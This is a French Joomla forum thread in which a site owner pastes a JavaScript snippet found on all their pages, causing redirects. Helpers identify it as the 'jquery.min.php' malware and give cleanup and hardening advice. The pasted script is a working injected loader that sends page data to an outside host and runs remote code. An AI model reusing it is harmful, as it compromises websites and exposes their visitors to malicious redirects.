virus sur mon site ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • virus sur mon site ?

    bonjour mon site fait des redirections vers sites louche.
    Code:
    <script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://newsco.fr/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
    sur toutes les pages j'ai ce code est-ce que selon vous ces lignes de codes sont normales ?

  • #2
    Re : virus sur mon site ?

    Bonjour,

    Non c'est pas normal ou ta trouvé ce code exactement ?

    Commentaire


    • #3
      Re : virus sur mon site ?

      Jquery.min.php est un virus qui s'incruste dans les fichiers index.php des différents templates sur ton site.

      Ton site est donc hacké.

      Si tu as un backup récent et propre il te faut le restaurer puis sécuriser ton site
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire


      • #4
        Re : virus sur mon site ?

        Envoyé par cavo789 Voir le message
        puis sécuriser ton site
        Salut,

        Que conseils tu pour securiser les sites joomla, aesecure ?
        Est-ce qu'un site avec admin tools, aesecure ou autre ne peut pas etre hacke ? j'imagine que oui mais c'est surement plus difficile ?

        Commentaire


        • #5
          Re : virus sur mon site ?

          Envoyé par Sebek Voir le message
          Salut,

          Que conseils tu pour securiser les sites joomla, aesecure ?
          Est-ce qu'un site avec admin tools, aesecure ou autre ne peut pas etre hacke ? j'imagine que oui mais c'est surement plus difficile ?
          Bonjour,
          sécuriser son site Web c'est deja le tenir a jour de son noyau et de ces extensions ! Même si celles ci sont installées mais pas activées

          Ensuite, oui il faut au MINIMUM protéger ton administration. Pour ça plusieurs solutions, du simple htaccess/htpasswd a des solutions plus pointues.
          - Aesecure est une protection globale sur serveur Apache puisqu'il intervient avant d'afficher la moindre page. Il va au dela aussi bien en terme de sécurité que de performance de ton site web
          - Admintools est une extension de sécurité pour Joomla et s'installe comme n'importe laquelle des extensions
          - le couple de fichiers .htaccess/.htpasswd va protéger un dossier particulier et tous les sous dossiers et fichiers de ce dossier par mot de passe serveur (rien a voir avec Joomla)

          Après, quand on protège son site web de la sorte, on évite bien 80% des tentatives d'intrusion par script d'attaque basique. Evidemment, le risque zero n'existe JAMAIS ! C'est aussi pour cela qu'on doit faire des sauvegardes
          Dernière édition par manu93fr à 13/11/2016, 16h43
          Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
          Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

          Commentaire


          • #6
            Re : virus sur mon site ?

            Merci Manu93

            Envoyé par manu93fr Voir le message
            Bonjour,
            sécuriser son site Web c'est deja le tenir a jour de son noyau et de ces extensions ! Même si celles ci sont installées mais pas activées
            -> je le fait tous les jours sur chaque extension et les extensions non utiles c.a.d non publie sont desinstallee

            du simple htaccess/htpasswd a des solutions plus pointues.
            - le couple de fichiers .htaccess/.htpasswd va protéger un dossier particulier et tous les sous dossiers et fichiers de ce dossier par mot de passe serveur (rien a voir avec Joomla)
            Je suis trop debutant sur le sujet pour entrer du code dans un .htaccess/.htpasswd et j'ai donc besoin de passer par des extensions joomla qui le font a ma place.
            Du coup j'essaye de me renseigner depuis quelques jour, a l'epoque de joomal 2.5 j'avais admin tools pour proteger le panel admin mais je voudrais plus.

            - Aesecure est une protection globale sur serveur Apache puisqu'il intervient avant d'afficher la moindre page. Il va au dela aussi bien en terme de sécurité que de performance de ton site web
            -> connais tu RSFirewal et si oui qu'en penses tu ? est-il utile d'installer plusieurs de ces extensions ou cela ne sert a rien (du genre RSFirewal, Aesecure, ou Admin tools pro) ?

            Et si on ne devait en choisir qu'une quelle est "THE" extension
            J'en profite pour rajouter que sur mon nouveau site les visiteurs pourront se loguer pour telecharger des fichiers est-il absolument necessaire de passer en HTTPS avec un certificat SSL ?


            Après, quand on protège son site web de la sorte, on évite bien 80% des tentatives d'intrusion par script d'attaque basique. Evidemment, le risque zero n'existe JAMAIS ! C'est aussi pour cela qu'on doit faire des sauvegardes
            -> oui ca cree aussi du business pour les extensions au passage

            Commentaire


            • #7
              Re : virus sur mon site ?

              est-il utile d'installer plusieurs de ces extensions ou cela ne sert a rien (du genre RSFirewal, Aesecure, ou Admin tools pro) ?
              Genre ceinture plus bretelles ? Dans ce domaine ce n'est pas évident, les risques d'interactions nuisibles ne sont pas nuls.

              J'en profite pour rajouter que sur mon nouveau site les visiteurs pourront se loguer pour telecharger des fichiers est-il absolument necessaire de passer en HTTPS avec un certificat SSL ?
              Absolument nécessaire non, mais fortement recommandé oui. Depuis quelques temps ça fait même partie des critères de classement de Google pour tous les sites. Maintenant il existe Let's Encrypt, et selon ton hébergeur il n'est pas impossible que tu puisses installer un de leurs certificats gratuits.
              Lorsque l'on se cogne la tête contre un pot et que cela sonne creux, ça n'est pas forcément le pot qui est vide.
              Confucius

              Commentaire


              • #8
                Re : virus sur mon site ?

                Je suis trop debutant sur le sujet pour entrer du code dans un .htaccess/.htpasswd et j'ai donc besoin de passer par des extensions joomla qui le font a ma place.
                c'est pourtant "basique"
                Il y a des générateurs sur le web qui peuvent aider

                connais tu RSFirewal et si oui qu'en penses tu ? est-il utile d'installer plusieurs de ces extensions ou cela ne sert a rien (du genre RSFirewal, Aesecure, ou Admin tools pro) ?
                Non, je ne connais pas
                Non aucun intérêt de multiplier les protections .... c'est comme superposer plusieurs antivirus .. non ?

                Et si on ne devait en choisir qu'une quelle est "THE" extension
                C'est souvent un choix perso ... les gouts et les couleurs ... perso je préfère une protection serveur "externe"
                Un gros baraqué qui dit "toi tu passes ... toi tu passes pas" directement a la porte de l'entrée

                est-il absolument necessaire de passer en HTTPS avec un certificat SSL ?
                Le "S" de https ne veut pas dire que ton site est sécurisé. Il veux juste dire que les echanges serveur/navigateur le sont car cryptés. Google le mets en avant, les navigateurs web recents aussi. Donc aucune obligation mais ça va devenir une référence de confiance ... donc a toi de juger
                Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                Commentaire


                • #9
                  Re : virus sur mon site ?

                  [QUOTE=manu93fr;1113770]perso je préfère une protection serveur "externe"
                  Un gros baraqué qui dit "toi tu passes ... toi tu passes pas" directement a la porte de l'entrée[QUOTE]

                  Du genre aesecure quoi .

                  Pour le SSL -> oui c'est juste pour crypter les informations lors du login des visiteurs.

                  Merci Manu et lesoutier pour vos reponses.

                  Commentaire


                  • #10
                    Re : virus sur mon site ?

                    Je ne saurais ajouter autre chose à ce qui a été dit. Un seul logiciel devrait "faire le job" et à toi de faire ton choix.

                    Je dirais juste (vu que je suis mal placé étant le développeur d'aeSecure) qu'une solution externe a des avantages mais aussi des inconvénients comme par exemple, justement d'être externe et de ne pas pouvoir s'incruster dans Joomla (par exemple détecter le nombre de tentatives d'intrusion (brute force)). Comme avantage que tu as apprends un seul logiciel quelque soit le type de sites (Joomla ou autre).

                    À toi de faire ton choix selon tes besoins et affinités.

                    Admin Tools et aeSecure proposent des versions gratuites et pleinement fonctionnelles.

                    Bonne soirée
                    Christophe (cavo789)
                    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                    Commentaire

                    Annonce

                    Réduire
                    Aucune annonce pour le moment.

                    Partenaire de l'association

                    Réduire

                    Hébergeur Web PlanetHoster
                    Travaille ...
                    X